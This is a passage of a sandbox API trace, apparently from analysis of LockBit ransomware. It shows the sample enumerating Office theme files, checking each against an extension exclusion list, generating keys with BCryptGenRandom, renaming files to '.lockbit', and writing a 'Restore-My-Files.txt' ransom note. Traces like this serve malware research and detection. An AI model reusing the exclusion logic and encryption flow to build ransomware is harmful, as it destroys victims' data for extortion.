lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0193.708] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Module.xml.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Module.xml.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0193.708] malloc (_Size=0xc0) returned 0x1fa2ed8 [0193.708] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xc0, FileInformationClass=0xa) returned 0x0 [0193.710] free (_Block=0x1fa2ed8) [0193.710] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Module.xml" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors") returned 1 [0193.710] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Restore-My-Files.txt") returned 87 [0193.710] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0193.710] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x18b81500, ftCreationTime.dwHighDateTime=0x1cac1e1, ftLastAccessTime.dwLowDateTime=0x51c9cf70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x18b81500, ftLastWriteTime.dwHighDateTime=0x1cac1e1, nFileSizeHigh=0x0, nFileSizeLow=0x3c4, dwReserved0=0x0, dwReserved1=0x0, cFileName="Newsprint.xml", cAlternateFileName="NEWSPR~1.XML")) returned 1 [0193.710] lstrcmpiW (lpString1=".", lpString2="Newsprint.xml") returned -1 [0193.710] lstrcmpiW (lpString1="..", lpString2="Newsprint.xml") returned -1 [0193.711] PathFindExtensionW (pszPath="Newsprint.xml") returned=".xml" [0193.711] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0193.711] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0193.711] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0193.711] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0193.711] lstrcmpiW (lpString1=".adv", lpString2=".xml") returned -1 [0193.711] lstrcmpiW (lpString1=".theme", lpString2=".xml") returned -1 [0193.711] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0193.711] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0193.711] lstrcmpiW (lpString1=".com", lpString2=".xml") returned -1 [0193.711] lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0193.711] lstrcmpiW (lpString1=".nls", lpString2=".xml") returned -1 [0193.711] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0193.711] lstrcmpiW (lpString1=".lock", lpString2=".xml") returned -1 [0193.711] lstrcmpiW (lpString1=".ocx", lpString2=".xml") returned -1 [0193.711] lstrcmpiW (lpString1=".mpa", lpString2=".xml") returned -1 [0193.711] lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0193.711] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0193.711] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0193.711] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned -1 [0193.711] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0193.711] lstrcmpiW (lpString1=".rtp", lpString2=".xml") returned -1 [0193.711] lstrcmpiW (lpString1=".diagcfg", lpString2=".xml") returned -1 [0193.712] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 [0193.712] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0193.712] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0193.712] lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0193.712] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0193.712] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0193.712] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0193.712] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0193.712] lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0193.712] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0193.712] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0193.712] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0193.712] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0193.712] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0193.712] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0193.712] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0193.712] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0193.712] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0193.712] lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0193.712] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0193.712] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0193.712] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0193.712] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0193.712] lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0193.712] lstrcmpiW (lpString1=".lockbit", lpString2=".xml") returned -1 [0193.713] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Newsprint.xml") returned 1 [0193.713] lstrcmpiW (lpString1="ntldr", lpString2="Newsprint.xml") returned 1 [0193.713] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Newsprint.xml") returned 1 [0193.713] lstrcmpiW (lpString1="bootsect.bak", lpString2="Newsprint.xml") returned -1 [0193.713] lstrcmpiW (lpString1="autorun.inf", lpString2="Newsprint.xml") returned -1 [0193.713] lstrcmpiW (lpString1="thumbs.db", lpString2="Newsprint.xml") returned 1 [0193.713] lstrcmpiW (lpString1="iconcache.db", lpString2="Newsprint.xml") returned -1 [0193.713] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\") returned="" [0193.713] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Newsprint.xml") returned=".xml" [0193.713] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0193.713] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0193.713] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0193.713] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0193.713] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0193.713] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0193.713] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0193.713] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0193.713] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0193.713] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0193.713] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0193.713] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0193.713] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0193.713] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0193.713] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0193.714] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0193.714] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0193.714] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0193.714] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0193.714] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0193.714] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0193.714] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0193.714] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0193.714] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0193.714] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0193.714] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0193.714] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0193.714] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0193.714] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Newsprint.xml.lockbit") returned 88 [0193.714] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Newsprint.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\newsprint.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0193.716] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0193.716] malloc (_Size=0x40068) returned 0x1ff1e60 [0193.716] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=964) returned 1 [0193.716] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0193.717] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0193.717] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0193.717] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0193.717] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0193.717] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0193.717] ReadFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0193.724] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Newsprint.xml.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Newsprint.xml.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0193.724] malloc (_Size=0xc6) returned 0x1fa2ed8 [0193.724] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xc6, FileInformationClass=0xa) returned 0x0 [0193.725] free (_Block=0x1fa2ed8) [0193.725] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Newsprint.xml" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors") returned 1 [0193.725] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Restore-My-Files.txt") returned 87 [0193.726] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0193.726] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf7572900, ftCreationTime.dwHighDateTime=0x1cac1e0, ftLastAccessTime.dwLowDateTime=0x603ce830, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf7572900, ftLastWriteTime.dwHighDateTime=0x1cac1e0, nFileSizeHigh=0x0, nFileSizeLow=0x3c2, dwReserved0=0x0, dwReserved1=0x0, cFileName="Opulent.xml", cAlternateFileName="")) returned 1 [0193.726] lstrcmpiW (lpString1=".", lpString2="Opulent.xml") returned -1 [0193.726] lstrcmpiW (lpString1="..", lpString2="Opulent.xml") returned -1 [0193.726] PathFindExtensionW (pszPath="Opulent.xml") returned=".xml" [0193.726] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0193.726] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0193.726] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0193.726] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0193.726] lstrcmpiW (lpString1=".adv", lpString2=".xml") returned -1 [0193.726] lstrcmpiW (lpString1=".theme", lpString2=".xml") returned -1 [0193.726] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0193.726] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0193.726] lstrcmpiW (lpString1=".com", lpString2=".xml") returned -1 [0193.726] lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0193.726] lstrcmpiW (lpString1=".nls", lpString2=".xml") returned -1 [0193.726] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0193.726] lstrcmpiW (lpString1=".lock", lpString2=".xml") returned -1 [0193.726] lstrcmpiW (lpString1=".ocx", lpString2=".xml") returned -1 [0193.726] lstrcmpiW (lpString1=".mpa", lpString2=".xml") returned -1 [0193.727] lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0193.727] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0193.727] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0193.727] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned -1 [0193.727] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0193.727] lstrcmpiW (lpString1=".rtp", lpString2=".xml") returned -1 [0193.727] lstrcmpiW (lpString1=".diagcfg", lpString2=".xml") returned -1 [0193.727] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 [0193.727] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0193.727] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0193.727] lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0193.727] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0193.727] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0193.727] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0193.727] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0193.727] lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0193.727] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0193.727] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0193.727] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0193.727] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0193.727] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0193.727] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0193.727] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0193.728] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0193.728] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0193.728] lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0193.728] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0193.728] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0193.728] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0193.728] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0193.728] lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0193.728] lstrcmpiW (lpString1=".lockbit", lpString2=".xml") returned -1 [0193.728] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Opulent.xml") returned 1 [0193.728] lstrcmpiW (lpString1="ntldr", lpString2="Opulent.xml") returned -1 [0193.728] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Opulent.xml") returned -1 [0193.728] lstrcmpiW (lpString1="bootsect.bak", lpString2="Opulent.xml") returned -1 [0193.728] lstrcmpiW (lpString1="autorun.inf", lpString2="Opulent.xml") returned -1 [0193.728] lstrcmpiW (lpString1="thumbs.db", lpString2="Opulent.xml") returned 1 [0193.728] lstrcmpiW (lpString1="iconcache.db", lpString2="Opulent.xml") returned -1 [0193.728] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\") returned="" [0193.728] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Opulent.xml") returned=".xml" [0193.728] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0193.728] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0193.728] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0193.728] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0193.728] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0193.728] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0193.728] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0193.728] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0193.729] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0193.729] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0193.729] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0193.729] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0193.729] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0193.729] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0193.729] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0193.729] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0193.729] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0193.729] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0193.729] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0193.729] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0193.729] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0193.729] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0193.729] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0193.729] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0193.729] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0193.729] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0193.729] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0193.729] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0193.729] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Opulent.xml.lockbit") returned 86 [0193.729] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Opulent.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\opulent.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0193.731] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0193.731] malloc (_Size=0x40068) returned 0x3df0008 [0193.731] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=962) returned 1 [0193.731] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0193.731] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0193.732] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0193.732] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0193.732] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0193.732] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0193.732] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0193.737] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Opulent.xml.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Opulent.xml.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0193.737] malloc (_Size=0xc2) returned 0x1fa2ed8 [0193.737] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xc2, FileInformationClass=0xa) returned 0x0 [0193.739] free (_Block=0x1fa2ed8) [0193.739] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Opulent.xml" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors") returned 1 [0193.739] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Restore-My-Files.txt") returned 87 [0193.739] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0193.739] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf8885600, ftCreationTime.dwHighDateTime=0x1cac1e0, ftLastAccessTime.dwLowDateTime=0x603ce830, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf8885600, ftLastWriteTime.dwHighDateTime=0x1cac1e0, nFileSizeHigh=0x0, nFileSizeLow=0x3c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Oriel.xml", cAlternateFileName="")) returned 1 [0193.739] lstrcmpiW (lpString1=".", lpString2="Oriel.xml") returned -1 [0193.739] lstrcmpiW (lpString1="..", lpString2="Oriel.xml") returned -1 [0193.739] PathFindExtensionW (pszPath="Oriel.xml") returned=".xml" [0193.739] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0193.739] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0193.739] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0193.739] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0193.739] lstrcmpiW (lpString1=".adv", lpString2=".xml") returned -1 [0193.739] lstrcmpiW (lpString1=".theme", lpString2=".xml") returned -1 [0193.739] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0193.740] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0193.740] lstrcmpiW (lpString1=".com", lpString2=".xml") returned -1 [0193.740] lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0193.740] lstrcmpiW (lpString1=".nls", lpString2=".xml") returned -1 [0193.740] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0193.740] lstrcmpiW (lpString1=".lock", lpString2=".xml") returned -1 [0193.740] lstrcmpiW (lpString1=".ocx", lpString2=".xml") returned -1 [0193.740] lstrcmpiW (lpString1=".mpa", lpString2=".xml") returned -1 [0193.740] lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0193.740] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0193.740] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0193.740] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned -1 [0193.740] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0193.740] lstrcmpiW (lpString1=".rtp", lpString2=".xml") returned -1 [0193.740] lstrcmpiW (lpString1=".diagcfg", lpString2=".xml") returned -1 [0193.740] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 [0193.740] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0193.740] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0193.740] lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0193.740] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0193.740] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0193.740] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0193.740] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0193.740] lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0193.741] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0193.741] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0193.741] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0193.741] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0193.741] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0193.741] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0193.741] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0193.741] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0193.741] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0193.741] lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0193.741] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0193.741] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0193.741] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0193.741] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0193.741] lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0193.741] lstrcmpiW (lpString1=".lockbit", lpString2=".xml") returned -1 [0193.741] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Oriel.xml") returned 1 [0193.741] lstrcmpiW (lpString1="ntldr", lpString2="Oriel.xml") returned -1 [0193.741] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Oriel.xml") returned -1 [0193.741] lstrcmpiW (lpString1="bootsect.bak", lpString2="Oriel.xml") returned -1 [0193.741] lstrcmpiW (lpString1="autorun.inf", lpString2="Oriel.xml") returned -1 [0193.741] lstrcmpiW (lpString1="thumbs.db", lpString2="Oriel.xml") returned 1 [0193.741] lstrcmpiW (lpString1="iconcache.db", lpString2="Oriel.xml") returned -1 [0193.741] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\") returned="" [0193.742] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Oriel.xml") returned=".xml" [0193.742] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0193.742] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0193.742] 